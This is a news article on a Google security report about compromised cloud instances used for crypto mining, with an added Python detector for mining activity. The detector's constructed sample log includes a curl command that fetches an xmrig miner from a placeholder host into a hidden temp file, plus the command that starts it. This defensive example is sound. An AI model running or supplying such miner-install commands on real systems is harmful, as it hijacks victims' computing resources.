• According to a Google security report, compromised cloud instances were used for crypto mining

  • Mining in the traditional sense and cryptocurrency mining are different things, but they share one trait: done illegally, both harm the environment, the economy, public order and governance. Online attacks have grown more common, and they include cryptocurrency mining abuse, phishing campaigns, ransomware and other threats.

    Consider this: a new Google cyber security report has revealed some troubling statistics. According to the report, most compromised Google Cloud instances are used for cryptocurrency mining.

    The first issue of the Threat Horizons report was published by Google’s Cybersecurity Action Team. The Threat Analysis Group (TAG), Google Cloud Threat Intelligence for Chronicle, Trust and Safety, and other internal teams contributed threat intelligence observations to it.

    According to the report:

    “Of 50 recently compromised GCP instances, 86% of the compromised Google Cloud instances were used to perform cryptocurrency mining, a cloud resource-intensive for-profit activity, which typically consumed CPU/GPU resources, or in cases of Chia mining, storage space.”

    Google Cloud is being used for illegal cryptocurrency mining.

    It went on to say that 10% of the compromised instances were used to scan other publicly accessible internet resources for vulnerable systems, and another 8% were used to attack other targets.

    It also sheds light on how the instances were compromised. In 48% of cases, the actor gained access because a user account or API connection on the Internet-facing Cloud instance had a weak password or no password at all.

    These malicious activities are not novel; phishing campaigns and ransomware are also becoming more common on the cloud platform.

    “Attackers also continue to exploit poorly configured Cloud instances to obtain profit through cryptocurrency mining and traffic pumping. The universe of ransomware also continues to expand with the discovery of some new ransomware that appears to be offshoots of existing malware with mixed capabilities.”

    Time is also a factor in the compromise of Google Cloud instances. The shortest observed interval between deploying a vulnerable Cloud instance exposed to the Internet and its compromise was 30 minutes, and in 58% of the cryptocurrency mining cases the mining software was downloaded within 22 seconds of the instance being compromised. The chart below illustrates this timeline.

    What does this mean? Given that timeline, the initial attacks and the downloads that followed were scripted in advance; no human intervention was needed on the attacker’s side. According to the report, “it is nearly impossible to intervene manually in these situations to prevent exploitation.” The best defense, it says, is to avoid deploying vulnerable systems in the first place or to have automated response mechanisms in place.
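    To make the point about automation concrete, here is an added example (not code from the Google report or from this article) of the kind of detection a defender would have to run automatically: it scans constructed host events from a cloud VM for mining indicators (a known miner binary name, a stratum:// pool URL, or an outbound connection to a port commonly used by mining pools), measures the seconds between the first login and the first indicator, and decides whether the host should be isolated without waiting for an analyst. The indicator lists, the 15-minute human-response assumption, the hostnames and the event lines are all constructed for illustration.

```python
# Added example, not from the report or the article: a toy detector for the
# crypto-mining pattern described above, run over constructed VM host events.
from dataclasses import dataclass
from datetime import datetime
import re

# Indicator lists are assumptions for illustration, not taken from the report.
MINER_BINARY_RE = re.compile(r"\b(xmrig|minerd|cpuminer|ethminer|chia)\b", re.IGNORECASE)
STRATUM_RE = re.compile(r"stratum\+(tcp|ssl)://", re.IGNORECASE)
COMMON_POOL_PORTS = {3333, 4444, 5555, 7777, 14444}
# Assumed time a human analyst needs to go from alert to containment.
HUMAN_RESPONSE_SECONDS = 15 * 60


@dataclass(frozen=True)
class Event:
    ts: datetime
    kind: str    # "login", "download", "exec" or "connect"
    detail: str  # free text: log message, command line, URL or host:port


def is_mining_indicator(ev: Event) -> bool:
    """True if the event names a known miner binary, carries a stratum URL,
    or is an outbound connection to a common mining-pool port."""
    text = ev.detail
    if ev.kind in ("exec", "download"):
        return bool(MINER_BINARY_RE.search(text) or STRATUM_RE.search(text))
    if ev.kind == "connect":
        if STRATUM_RE.search(text):
            return True
        m = re.search(r":(\d+)$", text)
        return bool(m and int(m.group(1)) in COMMON_POOL_PORTS)
    return False


def analyze(events):
    """Walk events in time order and return the first mining indicator, the
    dwell time in seconds since the first login, and a verdict. A dwell time
    shorter than a human can react to gets 'auto-isolate'."""
    events = sorted(events, key=lambda e: e.ts)
    first_login = next((e for e in events if e.kind == "login"), None)
    first_hit = next((e for e in events if is_mining_indicator(e)), None)
    if first_hit is None:
        return {"verdict": "clean", "dwell_seconds": None, "indicator": None}
    start = first_login.ts if first_login else first_hit.ts
    dwell = (first_hit.ts - start).total_seconds()
    verdict = "auto-isolate" if dwell < HUMAN_RESPONSE_SECONDS else "isolate"
    return {"verdict": verdict, "dwell_seconds": dwell, "indicator": first_hit.detail}


def parse_ts(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed sample: a password login followed 22 seconds later by a miner
# download, mirroring the report's timeline. Hosts and addresses are made up.
SAMPLE_EVENTS = [
    Event(parse_ts("2021-11-01T10:00:00"), "login", "sshd: accepted password for root from 203.0.113.7"),
    Event(parse_ts("2021-11-01T10:00:09"), "exec", "/bin/bash -c 'apt-get update'"),
    Event(parse_ts("2021-11-01T10:00:22"), "download", "curl -sL http://example.invalid/x/xmrig -o /tmp/.x"),
    Event(parse_ts("2021-11-01T10:00:25"), "exec", "/tmp/.x -o pool.example.invalid:3333 -u WALLET -p x"),
    Event(parse_ts("2021-11-01T10:00:26"), "connect", "pool.example.invalid:3333"),
]

# Constructed benign sample: an ordinary admin session with no miner.
BENIGN_EVENTS = [
    Event(parse_ts("2021-11-01T11:00:00"), "login", "sshd: accepted publickey for deploy from 198.51.100.4"),
    Event(parse_ts("2021-11-01T11:00:30"), "exec", "systemctl restart nginx"),
    Event(parse_ts("2021-11-01T11:00:31"), "connect", "deb.debian.org:443"),
]

if __name__ == "__main__":
    for name, evs in (("compromised", SAMPLE_EVENTS), ("benign", BENIGN_EVENTS)):
        print(name, analyze(evs))
```

    On the constructed compromised host the first indicator is the xmrig download 22 seconds after login, far inside the assumed 15-minute human reaction window, so the verdict is to isolate automatically; the benign session produces no indicator. In a real deployment the event source would be the VM's audit or flow logs and the isolation step would be a firewall or instance-stop action, neither of which this toy includes.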

    The Russian link

    In a mass phishing attempt, the Russian government-backed hacking group APT28, also known as Fancy Bear, targeted approximately 12,000 Gmail accounts. As in the campaigns mentioned above, the attackers tried to lure victims into changing their credentials on an attacker-controlled phishing page.

    In another campaign, a North Korean-backed group posed as Samsung recruiters and sent fake job offers to employees of South Korean information security firms.

    In addition, a recent report described scammers who hijacked YouTube channels and earned at least $8.9 million in October alone through bogus cryptocurrency giveaways.

    With malicious activity on the rise, enabling two-factor authentication (2FA) should be a top priority.
